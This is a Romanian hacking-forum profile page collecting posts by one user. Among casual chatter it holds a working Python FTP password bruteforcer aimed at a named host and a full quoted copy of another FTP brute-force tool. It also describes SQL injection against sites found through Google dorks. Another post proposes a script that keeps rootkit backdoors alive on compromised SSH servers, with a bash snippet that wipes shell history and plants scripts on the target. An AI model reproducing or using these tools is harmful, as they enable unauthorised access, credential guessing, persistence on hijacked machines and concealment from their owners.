Flubber
Active Members-
Posts
1765 -
Joined
-
Last visited
-
Days Won
11
Everything posted by Flubber
-
And why did you put the RSTCenter logo as your avatar? That is ... weird. Ai ABSOLUTA dreptate!
-
La un simplu reverse engineering, nu s-ar vedea contul e-mail si parola respectiva? Insemnand ca ti-ar da de urma la tot ce ai prins (in caz ca folosesti e-mail-ul ca un "database" central, unde vin mai multe informatii de la mai multe stealere spre exemplu) daca nu ai cripta, ascunde cumva datele respective (obfuscate)?
-
Stiu ca este un pic cam tarziu, dar cand a facut Pyth0n3 challenge-ul in legatura cu server-ul care rula SSH (a.k.a. root), am observat ceva in legatura cu server-ul FTP. Totul este explicat in codul urmator in comment-uri. #!/bin/env/python # Coded by Flubber [2010] # # Pentru challenge-ul propus de Pyth0n3 pe RSTCenter.com/forum # # - am observat ca port-ul FTP-ului este deschis si daemon-ul care ruleaza este VSTPD ("21 tcp port open , service vstpd ") # # am incercat o conexiune cu mai multe usere si conexiunea esua (imi era inchisa automat de catre serverul ftp) # # din cauza ca user-ul nu era corect, din moment ce Pyth0n3 a spus ca username-ul este "user", odata ce am incercat # # conexiunea cu user-ul respectiv mi-a cerut parola ftp-ul, tind sa cred ca parola pe ssh de la user-ul "user" este la fel # # ca cea de la ftp. Am scris acest bruteforcer simplu si primitiv pentru a demonstra asta # # Further notice [challenge-ul s-a incheiat, parola de la user era "geterror" -- tind sa cred ca aceasta nu era la fel # ca cea a user-ului de pe ssh] # # UPDATE: am primit un raspuns direct de la autorul challenge-ului, parola de la user-ul ssh era LA FEL ca cea de la # # user-ul de pe FTP, banuiala a fost una buna # print "\r\n[#] Coded by Flubber - 2010 - versiunea Python: 2.6.5\r\n" print "[*] Cateva setari elementare.\r\n" from ftplib import FTP # Setam parametrii in variabile (cum ar fi: target-ul, port-ul, etc.) victima = "server5.ftpaccess.cc" port = 21 timeout = 30 conexiune = FTP() status = "" def conectare(): try: done = conexiune.connect(victima, port, timeout) except Exception, e: print "[-] Conectare esuata, verifica adresa victimei." status = False else: print "[+] Conectare cu succes, printez banner-ul (daca e vreunul):" print "### INCEPUT " + "#" * 10 + "\r\n" print done + "\r\n" print "### SFARSIT " + "#" * 10 + "\r\n\n" status = True if status == True: print "[*] Incepem atacul dictionar." listaparolee = open("parole", "r") listaparole = listaparolee.readlines() listaparolee.close() for linie in listaparole: linie = linie.strip("\n") print "[*] Incerc user-ul " + '"' + "user" + '"' + " si parola: " + '"' + str(linie) + '"' + "." try: conexiune.login("user", linie) print "[+] Shiznotz! Am gasit ceva. Parola: " + '"' + linie + '"' + ".\r\n" print "[+] Returnez lista cu fisiere din directorul curent (dir):" conexiune.retrlines("list") print "\r\n" * 2 print "[+] Directorul curent (pwd): " print conexiune.pwd().strip("\n") print "\r\n[+] Mesajul welcome:" print conexiune.getwelcome().strip("\n") conexiune.quit() except Exception, e: nuamers = 1 if nuamers == 1: print "\r\n[*] Sfarsitul atacului." else: print "[-] Ceva a mers gresit. Hmm, oare ce?" conectare() Este primitiv codul si inca sunt varza*, orice critica este binevenita, orice greseala a codului, s.a.m.d. din care pot invata ceva. Dictionarul folosit este aici. Bineinteles, nu a fost si cuvantul "geterror" in dictionar, ceea ce a facut, ca, atacul sa esueze, crezand ca banuiala mea este una proasta [change teh wordlist to a better one, IDIAT!]. * - deasemenea, m-am inspirat din scriptul lui gunslinger in legatura cu "try:" si "except Exception, e"
-
Cool, ai lucrat ceva la el nu gluma. Dar! De ce limitarile respective? Si... de ce: print >> myfile, '<p align="center"><b><font color=','"',(var8),'"','size="3">' Si nu: myfile.write('<p align="center"><b><font color=','"',(var8),'"','size="3">') ? Este putin ciudat felul tau de a progama in Python, dar isi face treaba.
-
Niciodata......sa.......nu........SUBESTIMEZI! // LE: Insane! xD xD
-
ronin33dan: da-i omului o pauza, cel putin el ARE pofta de invatat nu vrea sa ii sparga Gigi Cosciug id-u lu printesa mirabela. Bine ai venit Mihai, niste tutoriale video daca te intereseaza (destul de bunicele desi cam vechi - de prin 2003 daca nu ma insel) - CBT Nuggets: Linux Series, explica frumos pentru incepatori pana la avansati. In primele 4 clipuri vei invata foarte multe, hai sa zic 5, pana si chestii hardware (cum scrie un HDD -- este un exemplu pentru a-ti demonstra informatia oferita in tutorialele video, nu vorbeste doar "dai wget" "apoi tar zxvf" "ls" "# gata, esti 'hacker'!"), si asa mai departe. Succes pe forum!
-
1. House of Flying Daggers IMDB: House of Flying Daggers (2004) Nota: 7.6/10 @ 38,836 votes 2. Mortal Kombat -> sunt mai multe sequel-uri IMDB: Mortal Kombat (1995) Nota: 5.4/10 @ 29,122 votes (cam low nota dar ma rog) 3. Ong-Bak (vezi ca este si Ong-Bak 2: Ong bak 2 (2008) -- 6.3/10 @ 5,817 votes) IMDB: Ong-bak (2003) Nota: 7.2/10 @ 23,701 votes Mai multe aici: Martial arts film - Wikipedia, the free encyclopedia Si aici: Kung Fu movies Torrent power.
-
Wordpress bruteforcer (python script) 04.08.2010
Flubber replied to hozarares's topic in Programe hacking
Recunosc acest stil de a programa in Python si de pe luna, gunslinger's style, un FTP bruteforcer tot de el scris: #!/usr/bin/python ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # This is ftp brute force tools [Updated]. # This was written for educational purpose and pentest only. Use it at your own risk. # Update : More efficient # : prevent loss added # : Anonymous checker added # VISIT : http://www.devilzc0de.com # CODING BY : gunslinger_ # EMAIL : gunslinger.devilzc0de@gmail.com # TOOL NAME : ftpbrute.py v1.5 # Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member # Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family # Greetz : all member of jasakom.com, jatimcrew.com # Special i made for jasakom member and devilzc0de family # Please remember... your action will be logged in target system... # Author will not be responsible for any damage !! # Use it with your own risk import sys import time import os from ftplib import FTP if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': SysCls = 'clear' elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': SysCls = 'cls' else: SysCls = 'unknown' log = "ftpbrute.log" face = ''' .___ .__ .__ _______ .___ __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ \/ \/ \/ \/ \/ \/ \/ \/ \/ http://www.devilzc0de.com by : gunslinger_ ftpbrute.py version 1.0 Brute forcing ftp target Programmmer : gunslinger_ gunslinger[at]devilzc0de[dot]com _____________________________________________________________________________________________________________________________________________ ''' option = ''' Usage: ./ftpbrute.py [options] Options: -t, --target <hostname/ip> | Target to bruteforcing -u, --user <user> | User for bruteforcing -w, --wordlist <filename> | Wordlist used for bruteforcing -h, --help <help> | print this help Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt ''' file = open(log, "a") def MyFace() : os.system(SysCls) print face file.write(face) def HelpMe() : MyFace() print option file.write(option) sys.exit(1) for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-u' or arg.lower() == '--user': user = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': HelpMe() elif len(sys.argv) <= 1: HelpMe() def checkanony() : try: print "\n[+] Checking for anonymous login\n" ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print "\n[!] Anonymous login successfuly !\n" ftp.quit() except Exception, e: print "\n[-] Anonymous login unsuccessful...\n" pass def BruteForce(word) : print "[?]Trying :",word file.write("\n[?]Trying :"+word) try: ftp = FTP(hostname) ftp.login(user, word) ftp.retrlines('list') ftp.quit() print "\n\t[!] Login Success ! " print "\t[!] Username : ",user, "" print "\t[!] Password : ",word, "" print "\t[!] Hostname : ",hostname, "" print "\t[!] Log all has been saved to",log,"\n" file.write("\n\n\t[!] Login Success ! ") file.write("\n\t[!] Username : "+user ) file.write("\n\t[!] Password : "+word ) file.write("\n\t[!] Hostname : "+hostname) file.write("\n\t[!] Log all has been saved to "+log) sys.exit(1) except Exception, e: #print "[-] Failed" pass except KeyboardInterrupt: print "\n[-] Aborting...\n" file.write("\n[-] Aborting...\n") sys.exit(1) MyFace() print "[!] Starting attack at %s" % time.strftime("%X") print "[!] System Activated for brute forcing..." print "[!] Please wait until brute forcing finish !\n" file.write("\n[!] Starting attack at %s" % time.strftime("%X")) file.write("\n[!] System Activated for brute forcing...") file.write("\n[!] Please wait until brute forcing finish !\n") checkanony() try: preventstrokes = open(wordlist, "r") words = preventstrokes.readlines() count = 0 while count < len(words): words[count] = words[count].strip() count += 1 except(IOError): print "\n[-] Error: Check your wordlist path\n" file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) print "\n[+] Loaded:",len(words),"words" print "[+] Server:",hostname print "[+] User:",user print "[+] BruteForcing...\n" for word in words: BruteForce(word.replace("\n","")) file.close() -
Poftim? Pai thread-ul asta a fost mai mult ca o invitatie la proiect, sa ne punem mai multi (cat mai multi) cu experienta capatanile la contributie si sa-l facem foarte foarte complex si eficient, adaugandu-i diferite optiuni.
-
Apropos, Nytro, daca ti se pare postul a fi un articol bun pentru revista respectiva, pot participa, daca doresti il pot reformula, bineinteles, folosind alti termeni si mai intai o introducere proprie facand referire la baza de date MySQL, etc. // P.S.: desi sincer nu prea le am fiindca nu m-am jucat cu MySQL deloc - da, exact, nu am instalat nicaieri si nici nu am "poke-uit-o" sa vad despre ce e vorba, la site-uri sunt praf, asa ca daca cineva mai experimentat s-ar oferii sa implementeze post-ul undeva sau sa-l reformuleze specificand anumite chestii ,explicandu-le mai bine... nicio problema... cheerz
-
Ei bine, cand am invatat si eu cat de cat Python, m-am tot intrebat cand o sa imi vina la indemana, la inceput mi s-a parut o pierdere de timp, invatand numai operatii matematice, liste, definirea obiectelor, modulelor, input-uri ale user-ului si alte vrajeli (asta din niste tutoriale video de pe YouTube), au fost intr-un fel OK, pana la un anumit moment cand devenisem sa ma simt frustrat (pur si simplu pentru faptul ca totul parea newbish -- voiam deja sa pun in aplicare cunostintele dobandite, sa mi se dovedeasca a fi folositoare, sa imi demonstrez ca nu a fost o pierdere de timp), pana cand am citit de pe site (cel oficial Python docs) niste articole, la inceputul inceputurilor (cand am vizionat clipurile respective pe YT) mi s-au parut grele sau plictisitoare, acum avand un habar despre ce este vorba mi-au fost de ajutor ceva mai mult. Despre ce cacat vorbesc eu aici? Recent, facand niste SQLi folosindu-ma de dork-uri cu prietenul magic Google (da da, sunt un lamer, 'vai faci SQLi folosindu-te de dork-uri, asa, dai la gramada si ce iti vine pe mana dai deface sa te dai mare hec?r' -- nu asa sta treaba), am dat peste un site ce afisa in sursa. Pagina respectiva pe care browser-ul minunat Firefox o interpreta dupa tag-urile HTML nu afisa nimic ciudat, ci eroarea propriu-zisa MySQL. Facand mai multe incercari la baza MySQL mereu mi se returna eroarea magica foarte aiurea. Aruncand un ochi in acea sursa am observat ca intr-un string "rtmp://" scria versiunea, sau ma rog "raspunsul" interogarii mele. Ei bine aici a intervenit partea in care Python (oh, te iubesc!) mi-a fost de ajutor. Folosindu-ma de LIMIT (cu totii uram asta, cel putin eu la greu) am observat ca imi arata in sursa corespunzator, la LIMIT 0,1 "rtmp://rahat", la LIMIT 1,1 "rtmp://alt_rahat" si asa mai departe, automatizarea acestui moment mi-a economisit o gramada de timp. Script-ul de mai sus nu face decat sa ia sursa paginii si sa o salveze intr-un log. Bineinteles, sursa paginii care este apelata cu adresa RAHAT LIMIT 0,1 1,1 2,1 etc. (scuzati daca m-am exprimat gresit, intelegeti voi ce vreau sa zic). Bineinteles, script-ul l-am "confectionat" nevoilor mele, nu este unul care se poate folosii la orice site (cum ar fi sqlmap), interesant insa a fost faptul cand am observat ca interogarea nu avea succes daca adresa nu avea la sfarsit &type=flv, interogarea fiind SINTAXA/*&type=flv, momentul acela insemnand implementarea back-end-ului. Nu stiu pentru cati dintre voi este folositoare aceasta informatie, sau tot ce am scris eu aici, pentru mine a fost o experienta mai unica, am mai intalnit site-uri la care raspunsul era in sursa, dar nu in felul acesta. Ma scuzati daca par foarte noob (asta si sunt, si un mare script kiddie, si lamer), nu sunt nicidecum un hacker super geniu, si ma scuzati daca va frustrez cu informatii d-astea foarte joase, precum acest thread, dar sper ca pentru alti incepatori, sau drq stie, sa ii/le fie de folos. // LE: bah, las-o drq de treaba, ma chinui sa scriu un thread sperand ca este folositor si imi este distrus, toate spatiile, totul codul, la postare, ce naiba se intampla? faceti un fix! patchuiti problema, eu nu am sa stau sa-l rearanjez, este enervant // LE(2): Oh da, output-ul a fost urmatorul (asa m-am uitat peste tabelele care ma interesau): Na ca l-am rearanjat putin intr-un final... offf, cat iubesc eu rst-u asta Aah! quote merge mai bine decat code
-
In primul rand as dori sa intreb cati dintre voi folosesc rootkit-uri pe ssh-uri. Daca da, ati experimentat ca victima sa foloseasca rootkit hunter, sau alte 'programe' de detectarea/curatarea rootkit-urilor? Daca da, ce spuneti daca am face un maintainer, adica un script mai complex la care, in caz ca rootkit-ul tau va fi scos, sau eventual port-ul pe care backdoor-ul rootkit-ului "tau" l-a deschis este blocat in firewall (sa zicem... iptables) eventual maintainer-ul sa scoata acea regula, si sa aduca totul la ... "normal" (pentru tine). Ce ziceti? Idei,sugestii,impotriviri,critici? // Adaugare: Am uitat sa mentionez, cati dintre voi stiti BASH si un limbaj de programare? // O alta adaugare: Am uitat sa mentionez ca eu deja lucrez la un programel de genul asta, dar nu este foarte elaborat, cu ajutorul lui cmiN am reusit sa fac ceva ceva .... nu foarte super ci foarte primitv, in Python si BASH. Un mic snippet: [B]a[/B](fisierul fiind executabil [chmod +x]): #!/bin/bash echo "[#] Flubber | 2010 | with help from cmiN -- many thanks." echo "[#] Keep it private (DO NOT DISTRIBUTE) and enjoy." echo "[*] Unsetting some history." unset HISTFILE unset HISTLOG unset HISTSAVE history -c echo "[*] Please wait while I will check if you are root." if [ "$(whoami)" != "root" ]; then echo "[-] Sorry, you are not root. This script requires for you to be root in order to execute. Exiting." exit 1; else echo "[+] You are root. Proceeding further." echo "[*] Trying to get a way in this system and copy our 'toys' there." mkdir TARGET cp 1.py TARGET cp b.sh TARGET history -c echo "[+] Done. Also cleaned some history. Isn't that cute?" echo "[*] Chmodding our ev4l scr1p7s to execute." chmod +x TARGET/script.py chmod +x TARGET/scriptbash echo "[+] Ev4l scr1p7s chmodded to execute." [...] alte prostioare, cum ar fi adaugarea la boot-up prin rc.local si alte balarii [...] fi stiu ca verificarea cu whoami e o prostie, nu sunt sigur insa, nu am testat sa fac un user cu acces de root direct (uid 0, gid 0) si sa vad daca la whoami este user-ul si nu mai spune root (in cazul asta scriptul bash de initiere ar esua) pareri, opinii, se ofera cineva sa imbunatatim, sunt curios cati se baga care AU HABAR si sa fie de incredere, insemnand sa nu dea aiurea script-urile, catre script kiddies (nu ca eu nu as fi unul) care sa imprastie mai departe, ci sa fie tinuta mai.. "secret" arhiva, adica sa o aiba si sa o foloseasca doar cei CARE MERITA si aici ar fi fost in folos acea sectiune privata magica minune as intra in mai multe detalii, dar mai intai sa vad daca a avut cineva experiente de genul, specificati si rootkit-ul daca doriti, eu unul fac asta pentru VTBoV05RPT0= (dati de 2 ori stiti voi ce)
-
Sir, no offense, DAR! Ca sa securizezi, sa previi astfel de atacuri (oricare ar fi ele) nu mai intai trebuie sa intelegi cum merg lucrurile, apoi sa gasesti gaurile, sa exploatezi, si sa repari. Am dreptate? Deci in principiu, mai intai trebuie sa "spargi" ca apoi sa patchuiesti/repari/etc. Daca am gresit, corecteaza-ma. Si bineinteles, UELC?M!
-
^ si alte exemple de genul imi ridica o intrebare: BA DA EI NU AU TEHNOLOGIE? Nu, acum serios, din cate am auzit ei sunt prosti, dar au tehnologie au software avansat si din cate cred eu ce folosim noi e un rahatzel pentru ei + ca mai e si FBI-ul la noi (sau nu stiu ce agent special) pentru a se asigura ca totul merge conform planului. Chiar sunt curios, raspundeti-mi si mie la intrebare si anume (ma repet, ca-mi place), ei nu au software sa iti dea peste cap toate modificarile tale (gen ora modificarii etc)? P.S.: Mi-a venit somatie acasa sa platesc o amenda (prins in fapt fara bilet) ce ma faaac? 200 de lei, ma ustura buzunarul!11oneunutradus. Aoleoo ajung sa spal wc-uri publice! Nuuu!
-
Gresit, gresit, gresit! Astea din articol sunt tarfe, curvele sunt astea descrise aici. Daca isi vinde Gigi Pedala a.k.a. Pimpo du New Y0rk hi5 lantu de la gat, poate ar platii si ele... 50 de lei.
-
Friend Adder Elite Cracked (hi5, youtube, facebook, tagged etc. spammer)
Flubber replied to a topic in Cosul de gunoi
Felicitari! akarki: ai sus website-ul oficial, din cate vad ofera si un Trial, incearca sa completezi campurile alea. -
Pax si tricoul lui faimos avand mesajul: "Phuck Google, ask me"
-
Vezi pe www.gameszone.ro si pe Computer Games , la sectiunea Download.
-
pytesser este un modul care trebuie importat, comanda aceea importa tot din modulul respectiv (pytesser), in ordine sa-ti functioneze, trebuie: 1: sa cauti daca exista modulul in folderele respective (extrase din arhiva -- daca asa s-a intamplat), daca nu vezi 2 -> -> 2: o cauti pe net sau dai e-mail celui care a facut proiectul, il poti intreba ce s-a intamplat cu libraria respectiva, daca este privata, iar daca nu si este sub gpl si open source... roaga-l frumos sa o impartaseasca cu tine sau.. 3: o faci tu de la 0 // Le: arunca un ochi pe: http://github.com/srobertson/pytesser/blob/144e57a70bc46d4fd08fd067b6fb8d18a78661af/pytesser.py si pe: http://code.google.com/p/pytesser/downloads/detail?name=pytesser_v0.0.1.zip sper sa te fi ajutat, salut
-
Am testat pe: Ubuntu 9.04 / Linux 2.6.28-11-server Nu a functionat.
-
New 'Kraken' GSM-cracking software is released
Flubber replied to begood's topic in Stiri securitate
Bine spus, desi este ingrijorator, poate asa o sa se iveasca si progresul; poate criptarea si mai buna a retelei. Multumesc pentru info. -
Ce design vedeti voi ma? Pentru inceput e OK, proiecte ca astea te lanseaza dar incearca sa experimentezi cat mai mult asa te vei duce in anumite probleme la care vei invata anumite chestii de pe urma rezolvarii lor, si aici triumfa practica fata de carticelele care sunt pe net si toate aburerile astea in video-uri s.a.m.d. fiindca altceva e in realitate si te poti lovii de o groaza de probleme. Straduieste-te mai mult in legatura cu Yahoo,AOL, etc. Daca ai nevoie de o referinta, sau sa arunci un ochi pe diverse surse din care sa te inspiri: asta este o sursa buna. Bafta
-
^ cred ca parola e scrisa in rusa iar stealer-ul nu suporta scris-ul in rusa (gen apare patratele sau "?"), corectati-ma daca gresesc // pe de alta parte, pot fi niste stelute
-
WHOAAA TREBUIE SA FAC! Multumesc frumos